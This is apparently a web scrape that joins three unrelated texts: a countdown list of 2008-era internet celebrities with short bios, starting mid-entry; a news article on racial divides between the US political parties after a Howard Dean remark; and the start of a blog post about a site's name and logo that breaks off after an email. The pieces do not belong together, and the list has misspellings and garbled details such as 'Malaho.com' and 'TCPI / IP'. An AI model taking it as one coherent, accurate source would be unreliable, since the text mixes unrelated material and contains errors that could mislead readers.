Chow had his initial success with TheTechZone.com , a massive ( 10,000 + pages ) computer hardware review site that he claims draws 200,000 page views per day , but decided to branch out and launched the site where he began doling out advice on how to make money online
Most of Chow ’s tips were related to advertising , linking and monetizing content , but he began to veer into dangerous territory : gaming Google .
In response to Chow advocating violating their guidelines , Google deliberately buried Chow ’s website in their page rankings .
Currently he makes around $ 30,000 monthly from his blog alone .
48 . John Battelle
Journalist and entrepreneur John Battelle is the CEO and Chairman of Federated Media , the online advertising company that represents such well - known blogs and web sites as Boing Boing , Ars Technica and Dooce among its large fold .
Battelle ’s background includes being a co-founding Editor with Wired magazine , as well as stints with MacUser magazine and the LA Times .
He is founder and Executive Producer of the Web 2.0 conference and still contributes to his own blog , Searchblog , where he writes about search engine news and about his thoughts on general web and technology happenings .
His ongoing contribution to entrepreneurship and online media has been recognized by the likes of Ernst and Young , Advertising Age and PCWorld .
47 . Om Malik
Om Malik is a journalist and blogger known for his coverage of the technology and computing fields .
Starting as a writer for Forbes magazine and later Forbes.com , he was also a senior writer for new technologies / venture capital magazine Red Herring and then took a position as senior writer for Business 2.0 magazine .
Where Malik really hit the radar , though , was when he started his Web 2.0 - themed blog GigaOM under his Giga Omni Media umbrella .
GigaOM claims readership numbers in the half million per month range and is one of the world ’s top ranked blogs , with recognition of its influence coming from the likes of PC Magazine , CNET and Technorati .
46 . John Markoff
A technology journalist with a long background in tech writing ( Infoworld , BYTE , San Francisco Examiner , New York Times and others ) , John Markoff found himself at the center of a media storm over his chronicle of computer hacker Kevin Mitnick in the 1990s .
Markhoff had written articles about Mitnick while he was on the run from police , then co-authored the book Takedown , which critics accused of exaggerating or even inventing parts of the Mitnick affair .
Continuing to cover the computer and technology fields for the NY Times , Markhoff has earned some ill will in the blogging community with his comparison of blogs to the amateur CB radio fad of the seventies .
45 . Danny Sullivan
Danny Sullivan is another one of those ‘ web celebrities who is n’t really well known to the general public .
But as a search engine guru , Sullivan is well - regarded by industry insiders and his opinion is highly valued by web masters , web - related media and engineers with companies like Google .
His Search Engine
Watch web site became a dominant collection of search engine optimization techniques and he also ran an industry conference called Search Engine Watch .
In 2006 , Sullivan left SEW ( which he had sold in 2005 ) to create a new search engine news and information site called Search Engine Land .
44 . Jason Calacanis
Jason Calacanis is a tech industry veteran .
His mid-nineties publication , The Silicon Alley Reporter , grew from a photocopied handout to a 300 page account of Silicon Valley happenings .
After the dot - com crash , Calcanis turned to blogging , and with the help of an investment from Mark Cuban , co-founded Weblogs , Inc . Weblogs had some very popular blogs under its umbrella , including Engadget .
After selling Weblogs to AOL Time Warner ( remaining onboard as CEO ) , Calcanis became General Manager for Netscape ’s web site , where he recruited top posters to popular sites such as Reddit , Digg and Flickr .
His latest venture , Malaho.com , is a controversial “ human - powered ” search engine that has generated considerable curiosity as well a very public blog post - fuelled spat with Dave Winer .
43 . Matt Drudge
Another alumnus of Time magazine ’s 2006 “ 100 Most Influential People ” list , Matt Drudge turned an e-mailed celebrity gossip hobby into a web - based scandal site credited with scooping traditional media sources on some of the biggest stories of the decade .
In 1998 , The Drudge Report was the first news outlet to break the Monica Lewinski story , a scandal that tainted the final years of Bill Clinton ’s presidency .
Since then ,
The Drudge Report is frequently cited by other media outlets and continues to post celebrity arrest mug shots , court documents , political coverage and breaking news stories .
The Drudge Report expanded into radio and television shows of the same name , but Matt is currently focused on his web site .
42 . Dave Taylor
Dave Taylor is a well known technology consultant and author .
His website , askdavetaylor.com , is a wide - ranging ( everything from Internet basics , to Mac or UNIX , Web design and newbie questions ) tech support forum , where readers submit a question and Dave Taylor answers it .
Taylor has expanded his range beyond traditional web technology into topics as diverse as video games , iPods and even the writing business .
Dave notes that askdavetaylor.com generated nearly 12 million visitors for 2007 and tech - related “ how to ” searches on Google frequently return askdavetaylor.com as a top - ranked choice .
Taylor also runs two other popular blogs , The Business Blog at Intuitive.com and his Attachment Parenting blog .
41 . Kevin Mitnick
When it comes to Internet - related celebrity figures , there are the famous and the infamous .
Kevin Mitnick definitely falls into the latter category .
A convicted computer hacker ( he spent 5 years in prison ) , Mitnick ’s method was social engineering rather than brute force hacking , meaning he relied on guesswork around people ’s passwords based on research ( for example ) , rather than running automated hacking tools .
Mitnick fought Internet access restrictions on his release and has since launched a computer security firm .
His web site is a popular target for hackers , with the ability to deface it considered a sign of hacking prowess .
In his most recent brush with web notoriety , online community The Well turned down Mitnick ’s application for membership , an event that spawned a flurry of posts in the blogsphere .
40 . James Gosling
James Gosling is a Canadian software developer and Computer Science Ph.D. working for Sun Microsystems , holding the position of Vice President and Sun Fellow .
Gosling is generally recognized as one of the creators of the Java programming language , credited with the original Java language design and implementation of its original compiler and virtual machine .
Gosling comments on the current state of Java on his blog at Sun .
In terms of web culture , Gosling is a frequent interview subject on Java - related topics , but his main contribution is technical ; as a creator and evangelist for Java he remains well behind the scenes to the general public , though no less important than the other web celebrities .
39 . Chris Pirillo
Chris Pirillo , aka “ lockergnome , ” is a well - known computer systems support guru and former TechTV host .
He runs the Lockergnome weblog and a group of tech support sites .
Lockergnome hosts an annual alternative technical conference known as Gnomedex , that typically focuses on cutting edge trends in online computing , including social networking and technical capabilities .
Pirilllo ’s own web site chrispirillo.com features an eclectic mix of opinions , technical support advice and tips , coupons and videos .
Pirillo is an evangelist for various web technologies including blogging , online video , RSS , Podcasting and Google AdSense , prolifically employing all of these on his web sites .
Pirillo has become known for his catch phrase “ we ’ll ‘ E ’ ya later , ” which he accompanies with an “ E ” hand gesture when on video .
38 . Leo Laporte
Leo Laporte is a media powerhouse in the field of technology .
His career includes writing as a columnist with leading industry publications and publishing a series of computing - related books including 101 Computer Answers You Need To Know and Poor Leo ’s Computer Almanac .
But by far his greatest influence and visibility has been through hosting or co-hosting a long list of TV and radio technology shows , including The Lab With Leo Laporte , The Tech Guy , Internet ! , The Screen Savers and Dvorak on Computers .
He also features guest appearances on a wide range of shows such as Live with Regis and Kelly and World News Now .
Laporte is also the creator of the most successful podcast network on the web : This Week in Tech .
37 . Glenn Reynolds
With his 2006 book , An Army of Davids : How Markets and Technology Empower Ordinary People to Beat Big Media , Big Government and Other Goliaths , law professor , Popular Mechanics Contributing Editor and blogger Glenn Reynolds put on paper his theory that technology has enabled ordinary people to grab a pulpit and make their opinions heard , and that “ journalism is becoming an activity , not simply a profession . ”
Reynolds ’
Instapundit blog has become one of the most widely read political weblogs , with its popularity and Reynolds ’ efforts to promote citizen blogging earning him the knick name of “ The BlogFather . ”
36 . Michael Arrington
Michael Arrington has been involved with a number of high tech start - ups .
He was the co-founder of Zip.ca , Pool.com , Achex and edgio .
His greatest impact on the world of Internet , technology and entrepreneurship is through his blog site TechCrunch .
Arrington ’s influence is frequently acknowledged by the media , including nods from Wired , Forbes and Time , which referred to him as a “ cybermogul ” on their 2008 Time 100 List .
With a vast network of industry contacts and information gleaned from research and socializing , Arrington ’s opinion or mention of a new web site on one of the TechCrunch affiliated blogs or podcasts can make or break the site .
35 . Jakob Nielsen
Jakob Nielsen is a tireless campaigner for improving web site usability .
He has published multiple books on the subject , holds patents related to Internet usability methods and has had a significant influence on web site design .
Nielsen ’s push for usability over appearance tends to shy away from fancy graphics , Flash - heavy and visually appealing sites , frequently putting him at odds with the graphic design community .
Nielsens web site , Useit reflects his design principles , relying solely on text and on his Altertbox columns , mailed out since 1996 to subscribers , discussing current issues in web usability .
Nielsen is also know for “ Nielsen ’s Law ” which ultimately points out that since home network speed increases at a slower rate than computer processor speed , user Internet experience is tied to network bandwidth .
34 . Mark Zuckerberg
Mark Zuckerberg is CEO and co-founder of social networking site Facebook.com .
With Facebook ’s success , he ’s become an extremely wealthy young man , at least on paper .
Based on a Microsoft investment of $ 246 million for a 1.6 % stake in the company , Zuckerberg is one of the world ’s youngest billionaires .
Attempts to increase revenue opportunities for Facebook have raised privacy concerns , and Zuckerberg has had to spend increasing amounts of time apologizing to users , some times via his blog on Facebook .
Zuckerberg has also faced legal action over claims he lifted the Facebook idea and possibly source code from another project he was involved with at college .
Despite his current woes , there is no dispute that Zuckerberg has proved that social networking is among the hottest trends on the net .
33 . Marc Benioff
Marc Benioff is the Chairman and CEO of CRM provider , Salesforce.com .
Eschewing the role of traditional packaged software - based models , Benioff is an avid promoter of software as an on - demand service ( or SAS ) .
His books
The Business of Changing the World and Compassionate Capitalism reflect his belief that business and technology can contribute to positive social change , a belief he backed with the launch of the Salesforce.com Foundation ( which donates 1 % of profits , 1 % of equity and 1 % of employee time to charitable causes ) .
Benioff ’’s contributions to both technology and social change have been recognized by awards from many publications and organizations , including Business Week , Fortune and eWeek .
32 . Jerry Yang
One of the richest men in the world , Jerry Yang is the CEO and co-founder of Yahoo !
Inc .
Starting as a web portal , then adding e-mail capabilities and incorporating Alta Vista ’s search engine , Yahoo ! is now one of the leading Internet brands .
According to Yahoo !
their web portal receives more traffic than any other web site on the Internet .
In recent months , Yang has had to deal with two significant controversies around his company : allegations that Yahoo ! had provided Chinese police with IP addresses used by dissidents to send e-mail via a Yahoo !
account ( resulting in the dissidents ’ arrest ) , and most recently , a failed bid by Microsoft to buy Yahoo ! for over $ 45 billion .
31 . Dave Winer
Known as an opinionated and outspoken proponent of web - based technology and culture , Dave Winer is the founder of UserLand Software , former owner of the blog - hosting site Weblogs.com , a former Editor with Wired magazine and creator of RSS ( Really Simple Syndication ) 2.0 .
Winer is credited with being a pioneer in the development of other important web technologies , including SOAP , XML - RPC and Podcasting .
His DaveNet essays , a popular forerunner to blogs , were published regularly from 1994 through 2004 , and distributed to readers via e-mail .
30 . Jeff Jarvis
Jeff Jarvis comes from a journalism and entertainment background .
A former television critic with TV Guide and People , he was the creator of Entertainment Weekly as well as editing or publishing columns with numerous newspapers and journals .
Moving his focus online , Jarvis was President and Creative Director of Advance.net and assisted the New York Times with the development of their About.com site .
His blog , Buzzmachine , focuses on media and news items with an emphasis on bringing opinion back to news .
Visitors to Buzzmachine doubled in 2005 after an infamous incident where Jarvis posted an open letter to Dell CEO Michael Dell , complaining about the “ lemon ” computer he had purchased and Dell ’s “ appalling ” customer service .
29 . Jonathan Schwartz
As President and CEO of Sun Microsystems , Jonathan Schwartz has a great deal of influence in the world of technology .
On first arriving at Sun , he was involved in the marketing of Java , the software that has become a leading development platform for web - based and mobile applications .
Schwartz believes that society has begun to transition from information consumption to a participatory stage where people create ideas and content as well .
He uses his own blog extensively to discuss all things Sun , including corporate updates , interesting projects and interviews with employees , giving the public an unprecedented look at the inner workings of a large corporation .
28 . Kevin Kelly
Kevin Kelly is an author , columnist and “ Senior Maverick ” ( and Founding Executive Editor ) of one the leading cultural institutions of online culture : Wired magazine .
He was also involved in the launch of online community The Well .
Kelly ’s book Out of Control : The New Biology of Machines , Social Systems and the Economic World was a required read for actors in the seminal cyber film The Matrix , and an interview with Kelly is included on some DVD release versions of the movie .
Recently , Kelly co-founded the Linnean Enterprise , an ambitious ( 25 year and $ 5 billion ) project to identify , describe and create an online catalog of all living species .
27 . Tom Anderson
Tom Anderson is the President and co-founder of popular social networking web site MySpace .
He gained public fame as the most known face on MySpace because his name appeared as a default “ friend ” on all newly created accounts ; at this point in time ( July , 2008 ) , Tom has over 232,000,000 MySpace friends .
Anderson ’s account was also used for service announcements , only adding to his notoriety .
As a result of all this exposure , Anderson became an easy target for parody and has been lampooned by comics , singers , TV shows , writers and artists .
Rupurt Murdoch ’s purchase of MySpace for $ 580 million probably helps Anderson get past the ribbing .
26 . Tim O’Reilly
Tim O’Reilly is the founder and CEO of O’Reilly Media , a company known for publishing computer and technology - related books .
Working closely with the tech community , O’Reilly is often at the leading edge of technological shifts , leveraging his access to push his agenda of “ changing the world by spreading the knowledge of innovators . ”
O’Reilly Media hosted a 1998 meeting that became known as the Open Source Summit , and a 2005 conference hosted by O’Reilly brought the term Web 2.0 to the front .
Tim O’Reilly has been a long - time supporter of the Open Source and Free Software movements , an involvement that led to a dispute with Amazon.com over that company ’s patent on the concept of “ one - click ” shopping .
25 . Vint Cerf
A former Chair of ICANN ( Internet Corporation for Assigned Names and Numbers ) , Vinton ( Vint ) Cerf is credited as being one of the founders of the Internet , even frequently referred to as “ the father of the Internet . ”
While at DARPA ( US Department of Defense Advanced Research Projects Agency ) , Cert co-designed the TCPI / IP protocols that underlie Internet architecture and as Vice President of MCI Digital Information Services , Cerf led the team that created MCI Mail , the first commercial Internet mail service .
His contributions toward the Internet have earned him a myriad of honors and recognition , including the Turing Award and the Presidential Medal of Freedom .
Currently , Cerf is Vice President and Chief Internet Evangelist with Google .
24 . Matt Cutts
Matt Cutts is a software engineer working with the quality group at Google , where he currently heads up the Webspam Team .
Cutts is known for introducing the Google Webmaster Guideline and his efforts to crack down on the proliferation of link spam .
He is a celebrity engineer in web circles , helping webmasters to understand how Google ranks their sites , while also leading a fight against spammers .
Cutts was the center of some controversy in 2006 when he allegedly admitted to post to web - related sites under the identity of GoogleGuy .
Cutts ’ blog is a mix of Google and search engine - themed material combined with general interest posts .
23 . Arianna Huffington
The Huffington Post , a liberal news , commentary and blog site launched in 2005 , is a frequently cited media reference thanks to co-founder and Editor - in - Chief Arianna Huffington and her team of writers and contributors .
Posts include material from politicians and celebrities seeking an outlet to voice their opinions .
Author of a dozen books , Huffington ’s recent output does n’t pull any punches , including 2004 ’s : Fanatics and Fools : The Game Plan for Winning Back America .
A Huffington - led group ’s 2003 anti-SUV campaign , comparing driving an SUV to funding terrorism , helped to cement her reputation and she continues to make appearances as a commentator on television as well as co-hosting several radio shows .
Arianna Huffington was named to Time magazine ’s List of the World ’s 100 Most Influential People in 2006 .
22 . Cory Doctorow
A sought out commentator on popular culture and technology , Cory Doctorow is a Canadian author and blogger , well known as an outspoken activist / agitator for liberalizing copyright laws and digital rights management .
Doctorow spent four years working for the Electronic Frontier Foundation before leaving to pursue a full - time writing career in 2006 .
He co-edits the popular blog Boing Boing , and maintains his own Craphound site as well .
Cory Doctorow released several of his science fiction novels under Creative Commons licenses , including 2003 ’s Down and Out in the Magic Kingdom .
A columnist with Wired , Make and Popular Science , Doctorow also contributes to various other online and print media outlets .
21 . Jeff Bezos
Named Time magazine ’s 1999 Person of the Year , Jeff Bezos founded Amazon.com , steered it through the dot - com stock collapse of the late 1990s by pursuing an unlikely strategy of slow growth and turned the company into an Internet retail giant .
From its beginning in 1994 as an online book retailer , Bezos ( President , CEO and Chairman of the Board ) has grown Amazon.com into a diversified outfit that not only dominates online book sales , but is also a major player in the sales of DVDs , CDs , video games , toys and virtually any other commodity .
Amazon has continued to expand by offering music and video download services , affiliate relationships , self - publishing for authors and even its own e-Book reader hardware platform , the Kindle .
20 . Kevin Rose
Kevin Rose was well - known in technology circles thanks to his work on TechTV and G4 , including hosting Attack of The Show !.
He has been involved in the podcasting movement , including the highly successful Diggnation , which claims 250,000 downloads per episode , and appearances on This Week In Tech .
By far , though , Rose is best known for his incredibly popular Web 2.0 site digg.com .
Digg , a social bookmarking site , cost Rose a couple thousand dollars when first launched in 2004 and quickly grew to be a Web 2.0 success story , landing him on the front cover of Business Week magazine in April , 2006 .
Rose ’s most recent ventures include the social networking site pownce.com , which went live in January of 2008 , and online video network Revision3 .
19 . Robert Scoble
Considered to be the person for whom the term “ spokesblogger ” was coined , Robert Scoble was a successful blogger who joined Microsoft in 2003 and used his popular personal blog scobleizer.com to post comments that were often more favorable toward Microsoft than commentary found on other sites .
Scoble left Microsoft in 2006 , joining Podtech.net as Vice President of Media Development , leaving in 2008 to join Fast Company as a video blogger .
Scoble has helped prove the value of blogging as an interactive platform and has also effectively illustrated blogging ’s benefit in customer relationships .
By pursuing video blogging , Scoble may be on the leading edge of the next evolutionary step in blogging .
18 . Lawrence Lessig
Founder of the Creative Commons and a board member of the Electronic Frontier Foundation , law professor Lawrence Lessig has become a central figure in technology copyright , as a critic of restrictive software patents , copyright laws and wireless spectrum ownership .
Putting his money where his mouth is , Lessig ’s books The Future of Ideas , Free Culture and Code : Version 2.0 have been made available as free downloads under a Creative Commons license .
In 2008 , a Facebook group and web site began a “ draft Lessig for congress ” push , a suggestion that Lessig has resisted , arguing that a rush campaign with himself as a candidate would hurt the Change Congress movement he supports .
17 . Guy Kawasaki
Once best known as a Macintosh marketing guru , Guy Kawasaki put in several stints with Apple , first as a Mac Evangelist and then as an Apple Fellow .
As an author , he has been a columnist and published eight books , including Rules For Revolutionaries .
Kawasaki ’s blog , How To Change
The World , is a popular read for his thoughts on technology , business , Web 2.0 and other topics and includes a job posting board .
As Managing Director of Garage Technology Ventures , Kawasaki has turned his attention to venture capital and funding start - up firms .
Kawasaki gained notoriety in 2007 when he announced a new web 2.0 site , Truemors , that became an experiment around how inexpensively a web business can be launched ( Kawaski claimed Truemors cost just over $ 12 k ) , although it has n’t quite lived up to the considerable hype .
16 . Bruce Schneier
Bruce Schneier has accomplished the unlikely feat of bringing cryptography and computer security into pop culture ; he ’s been mentioned in movies ( The DaVinci Code ) and the sitcom Everybody Loves Raymond and is in high demand in media and government circles as a security expert .
The founder and CTO of computer network security firm BT Counterpane , Schneier has created several cryptographic algorithms and written a number of books about both cryptography and computer security , including Beyond Fear : Thinking Sensibly About security in an Uncertain World .
His free monthly newsletter Crypto - Gram has over 130,000 subscribers and his web site is a popular destination for those interested not only in computer security issues , but in the debunking of general security - related myths .
15 . Jimmy Wales
“ Imagine a world in which every single person on the planet is given free access to the sum of all human knowledge .
That ”s what we ”re doing . ”
This , according to Jimmy ( Jimbo ) Wales in a 2004 Slashdot interview , is the concept behind Wikipedia .
The Internet was already taking a toll on traditional paper - bound encyclopedias , but the 2001 launch of Wikipedia , Wales ’ online knowledge base comprised of user - generated , collaborative , peer - edited articles , dealt them a crippling blow .
Despite some disputes around Wales ’ personal vs. Wikipedia finances and ongoing controversy whenever Wikipedia entries are edited under suspicious circumstances , Wikipedia has become a standard online research tool with a knowledge base nearing 2.5 million ( English language ) articles and some 75,000 active contributors .
14 . Paul Graham
Paul Graham first rose to prominence as co-founder of Viaweb , the first ASP ( application service provider ) software , a product that ushered in the era of practical Internet Retail .
Viaweb was sold to Yahoo ! and re-branded as Yahoo !
Store .
Graham has gained some fame since then as a writer , with several books to his credit and a popular personal web site , paulgraham.com , where he has posted material that has helped inspire SPAM - filtering technology , among other things .
A collection of his essays has been published as a book titled Hackers and Painters .
As a venture capitalist , Graham ’s Y Combinator has provided start - up funding for dozens of firms , including popular Web site reddit.com .
13 . Sergey Brin
A Russian - born , American billionaire ( one of the youngest billionaires on the planet ) , Sergey Brin is the President of Technology at Google ( the company he co-founded with Larry Page ) .
Together with Page and CEO Eric Schmidt , Brin shares the honor of being named by PC Magazine as first on its list of the 50 Most Important People on the Web .
Brin turned a fascination with data mining and data extraction into a computer science project at Stanford University and parlayed that work into what would soon become the web ’s most popular search engine .
Brin is a frequent speaker on the topic of technology and has appeared as a guest on numerous TV shows .
12 . Chris Anderson
Editor - in - Chief of influential technology - focused magazine Wired , Anderson is also author of The Long Tail : Why The Future of Business Is Selling More .
Anderson ’s Long
Tail blog allows him to expand on his theory that the Internet has allowed for a greater diversity of products to be sold profitably because of the increased market size for any given niche product compared to traditional retailing opportunities .
Recently , Wired published Free , an article by Anderson based on his forthcoming book of the same name .
During his tenure , Anderson has helped boost wired .
com ’s blogging presence , including the creation of GeekDad , a blog that allows him to indulge his fascination with radio controlled vehicles and other high - tech “ toys ” .
11 . Tim Berners - Lee
While the world wide web is as close to ubiquitous as one could imagine these days , this was n’t always the case .
In fact , less than twenty years ago , it did n’t exist .
The Internet had been around for some time , but it was largely the domain of academics , the military and technology geeks .
Sir Tim Berners - Lee is the focal point for the web as we know it today , the individual who first combined a series of concepts and technologies ( domain name system , TCP / IP protocol , the Internet and hypertext ) to create the world wide web .
The first web site went live in August , 1991 and we have n’t looked back since .
Berners - Lee is also the founder and Director of the World Wide Web Consortium ( W3C ) , an organization tasked with creating web standards .
10 . Larry Page
One of the two founders of Google , Larry Page helped design the original Google search engine and was the company ’s first CEO .
As Google began to grow into something much more ambitious , Page moved out of the CEO role ( which was filled by technology veteran Eric Schmidt ) , taking on the position of President , Products .
Together with Schmidt and co-founder Sergey Brin , Page is responsible for the day - to - day operations of Google , a company which now employs over 10,000 people worldwide .
Along with Brin and Schmidt , Page was named by PC Magazine as first on its list of the 50 Most Important People on the Web .
9. Eric Schmidt
Voted by PC Magazine as first on its list of the 50 Most Important People on the Web ( along with fellow Google executives Larry Page and Sergey Brin ) , Dr. Eric Schmidt has a very long and influential career in the technology industry .
Companies he has held prominent positions with include Sun Microsystems ( CTO and leader of JAVA development ) and Novell ( CEO ) .
In 2001 he was hired as Chairman of the Board and CEO of Google .
In addition , Schmidt joined Apple ’s Board of Directors in 2006 , making him a significant part of two of the most influential technology companies around .
Schmidt has helped Google to continue its rapid growth , making him one of the richest men in the world .
8. Scott Adams
Cartoonist Scott Adams hit a nerve with Dilbert , his widely - syndicated cartoon about white collar workers toiling in a cubicle farm , based on his own experience working in high tech firms .
Among the popular cultural terms spawned by Dilbert are “ Pointy Haired Boss ” and “ Nerdvana . ” dilbert.com has grown into a destination site with daily cartoon strips and additional content including Dilbert widgets , animation and mashups .
Taking advantage of Web 2.0 social aspects , readers vote on and rank comic strips .
Adams ’ blog dilbertblog.
typepad.com is separate from the Dilbert comic empire and allows Adams to exercise his acerbic wit on a wide range of topics from the political to environmental and pop culture .
7. Mark Cuban
American Billionaire Mark Cuban sold a software reselling business ( MicroSolutions ) to Compuserve , using the proceeds to fund Broadcast.com , which he sold to Yahoo ! for $ 5.9 billion in Yahoo ! stock .
Cuban then bought the Dallas Mavericks NBA team .
He remains interested in media distribution and is a strong proponent of high definition video ; he is currently Chairman of HDNet and part of 2929 Entertainment , which made news in 2006 by being the first production company to release a movie ( Bubble ) in theatres and on DVD simultaneously .
Cuban ’s blogmaverick.com gives him the pulpit to reach the masses on topics close to his heart , including video , TV and The Mavericks .
6. Chris Crocker
If you ’ve been near a computer recently , chances are you ’ve either seen or heard of the infamous “ LEAVE BRITNEY ALONE ! ” videos , the first of which Chris Crocker posted to his MySpace page , while the second went to YouTube .
A response to media backlash against Britney Spears , particularly the critical abuse she suffered after her “ comeback ” performance at the 2007 MTV Music Video Awards .
Crocker ’s video featured an over the top performance that rapidly made it one of YouTube ’s most viewed clips and gained Crocker instant fame .
He appeared on a series of television shows , including various news programs , The Howard Stern Show and Jimmy Kimmel Live and was honored with an award in Wired magazine .
“ LEAVE BRITNEY ALONE ! ” has inspired hundreds of parody videos , commentary videos and proved how effective YouTube can be for viral content distribution .
5. Seth Godin
Seth Godin is a best - selling author and speaker .
His blog , among the most popular on the Internet , is focused on how ideas spread and permission marketing .
Seth ’s marketing ideology describes a powerful consumer that , thanks to the Internet , is not subject to the television monopoly anymore .
Following this ideology he created in 2005 Squidoo , which is a social network where users can share their recommendations or expertise on different topics .
It would be difficult to visit any marketing related website without come across a mention to Seth ’s ideas .
He is also the co-founder of Yoyodyne , a pioneer online marketing company .
Yoyodyne was sold to Yahoo ! in 1998 , and seth became a VP of Permission Marketing for the search company .
4. Michelle Malkin
Michelle Malkin is a blogger , columnist and political commentator .
She makes many guest appearances on radio and television shows like Fox News Channel , but it is perhaps through her blog that she shines the most .
Despite claiming that she “ was born and remain an ink - stained wretch , ” MichelleMalkin.com is one of the most popular conservative political blogs on the Internet .
Her articles are often mentioned on other media outlets , including several mainstream publications , which illustrates the important role that bloggers are taking on the new media landscape .
In 2007 the National Republican Senatorial Committee named Malkin one of the best consersative bloggers on the country .
A couple of years ago she also founded the Hot Air broadcast network , following on the success of her blog .
3. Beppe Grillo
The Italian comedian and activist became famous by his political satire .
Inside his television shows he would attack directly corrupted politicians and blow financial scandals open .
He became so uncomfortable to politicians and business men alike that in the late 80s he was banished from television in Italy
The television ban did not silence Grillo , though .
He continued to perform in theaters all over the country , and in 2003 he started the blog BeppeGrillo .it .
The success was immediate , and today his blog is among the 10 most popular in the world according to Technorati .
What does that mean in numbers ?
Well , his posts receive over 1,000 comments on average .
Among other brilliant stunts , in 2005 he bought a full page of advertising on a national newspaper , and used it to ask for the regisnation of the governor of Bank of Italy ( who was involved in several scandals ) .
2. Perez Hilton
Capitalizing on a seemingly endless public appetite for celebrity gossip , Mario Armando Lavandeira Jr. started blogging under the pseudonym Perez Hilton ( taking his nick - name from socialite and professional celebrity Paris Hilton ) .
Rocketing to fame in a matter of months , he soon launched PerezHilton.com , where he claims to receive upwards of eight million page views daily .
Content tends toward the juvenile , but Perez has gained a huge audience by posting celebrity photos with catty comments ; some are even adorned by his “ doodles ” of genetalia , horns , drug remnants or other objects .
Controversy surrounds Hilton , not just because of the nature of his comments , but also because of accusations of illegally copying photos from other sites and a habit of “ outing ” celebrities he suspects of being gay .
1. Tila Tequila
Tila Tequila is the stage name for Tila Nguyen .
First gaining popularity as a model for Playboy , Tequila was soon featured in other magazines such as Maxim and Stuff , and begun recording music and putting in appearances on reality shows including VH1 ’s Surviving Ted Nugent and Identity .
On Identity , she claimed to have over one million MySpace friends .
One reality show , A Shot At Love With Tila Tequila , featured twenty contestants ( both men and women ) vying for Tila ’s affections , a mix that caused considerable controversy among conservative Christians .
She has gained fame as a force in self - promotion , with her website tilashotspot.com flogging her music , videos , selling photos and even marketing her own fashion line .
White Party , Black Party : Racial Division in American Politics
Rarely Discussed in Public and Almost Never by Politicians
In an interview on National Public Radio last week , Democratic National Committee chairman Howard Dean touted the racial and gender diversity of the Democratic Party to the Republican Party .
In what sounded like a slip of the tongue , he momentarily referred to the GOP as the " white party . "
Paging Dr. Freud .
The McCain campaign pounced on the remark .
Carly Fiorina , former CEO of Hewlett - Packard and chair of Victory 2008 -- and one of the highest - ranking females in the McCain campaign -- issued a statement calling Dean 's comments -- as if they had been intentional -- " insulting , inappropriate , and have no place in this election . "
What Dean said was , " If you look at folks of color , even women , they 're more successful in the Democratic party than they are in the white , uh , excuse me , in , uh , Republican party . "
" He misspoke and corrected himself immediately , " Stacie Paxton , DNC press secretary said Sunday .
In any case , Dean raised an issue that is rarely discussed in public and almost never by politicians : the marked racial division by party in American politics .
Members of the country 's largest minority groups -- blacks , Latinos , Asian - Americans -- are predominantly Democratic .
According to 2004 statistics , white Americans are split evenly between the two parties with an equal percentage who are independents .
But 90 percent of registered Republicans are white .
These cold numbers are reflected in the audiences Sens. Barack Obama , D - Ill. , and John McCain , R - Ariz. , attract .
In this year 's presidential race , a crowd at an Obama public event often looks like a Benetton ad , compared to a McCain event , where the crowds are overwhelmingly white .
No doubt , a lot of this is because Obama is African - American ( or , more accurately , half - black ) .
The prospect of a black president has clearly excited many black Americans .
For more than 40 years , African - Americans have voted overwhelmingly Democratic for president , by margins of up to 9 - to - 1. Hispanics and Asian - Americans traditionally vote Democratic , but by smaller margins .
A look at voter registration shows that 45 percent of Latinos are Democrats .
Just 19 percent are Republican .
Forty - one percent of Asian - Americans are Democrats compared to 18 percent , who are Republican .
The Democratic party overall is 65 percent white and 35 percent non-white .
Ninety percent of registered Republicans are white .
For the Republican Party , these figures may be ominous for the future , if not the present .
According to a Census Bureau report last week , the country is rapidly becoming less white .
It is projected that , in 2042 , whites will makes up less than half of the population .
" The demographic trends favor the Democrats , because we are an inclusive , accepting party , " Dean said in the NPR interview .
Last March , when McCain accepted the mantle of presumptive Republican presidential nominee , he vowed to campaign to all Americans , an implicit rebuke of past Republican nominees who often ignored minority voters .
President Bush made a serious effort to woo Hispanic voters in 2000 and 2004 , and it paid off with significant inroads in that traditonally Democratic bloc .
McCain has campaigned among African - Americans in New Orleans and Selma , Ala. , during a week - long swing that his campaign informally dubbed as his tour of places Republicans do n't normally go .
He has also addressed black and Latino civil rights organizations , and targeted Latino voters with TV and radio ads in Spanish .
" McCain has campaigned in the African - American community more than any Republican nominee I know of , " a McCain senior adviser said , although he conceded that Obama will probably win the black vote by a record margin .
" Obviously , with the first African - American presidential candidate ( of a major party ) , Obama will get a record percentage of the African - American vote .
That 's logical .
That 's to be expected . "
The adviser predicted that McCain would do well -- for a Republican candidate -- with Hispanic voters , projecting that he could get as much as 40 percent of the Latino vote , in part because of his sponsorship of last year 's immigration reform bill that went down to defeat .
But , so far , McCain 's efforts to diversify his support have not shown very visible results .
Visit a McCain public campaign event in , say , Michigan , Pennsylvania , Florida , Ohio -- states with diverse populations -- and chances are the crowd will be 90 - plus percent white .
In fairness , approximately the same percentages would apply to the media assigned to the two presidential candidates .
Last December , McCain was asked on his campaign bus , the Straight Talk Express , why he thought the audiences at his campaign events in Iowa and New Hampshire were almost all white .
He said it was probably because it reflected the populations of those states , both overwhelmingly white .
McCain also said the GOP would have to attract more minorities or eventually face extinction as a matter of demographic trends .
Last year , former New York Rep. Jack Kemp , who was the GOP vice presidential nominee in 1996 , decried the lack of diversity within his party 's ranks .
" We sound like we do n't want immigration ; we sound like we do n't want black people to vote for us , " said Kemp .
" What are we going to do -- meet in a country club in the suburbs one day ?
If we 're going to be competitive with people of color , we 've got to ask them for their vote . "
Black Americans , in particular , complain that Republicans have sometimes willfully overlooked them .
When Tavis Smiley , the African - American radio commentator , hosted a GOP candidate 's forum at Morgan State University in Baltimore , most of the top Republican candidates -- including McCain -- declined to attend , citing scheduling conflicts .
Earlier in the year , when Univision , the Spanish language network , tried to hold a Republican presidential debate , only McCain accepted .
The event was canceled .
Posted on May 2 , 2007 in Articles
This is effectively the third part of a series on ‘ What is PBH ’ .
See Alec and Kit ’s entries for more discussion on the topic .
Recently , we at PBH have come under fire for our name and our logo .
After Liberally Mirth cross-posted my post from Peace Tree ( it was here , but has since been removed ) , the owner of the site sent me an email regarding her hesitations with our site , particularly our title and logo :
Alec ,
I want to feature your blog at LM , but its title and , especially , its logo of a woman being spanked make me hesitant .
I ’m sure I simply do n’t understand their meaning .
When you have time and nothing better to do , could you tell me your thinking about them ?
Thanks ,
mirth / Elizabeth
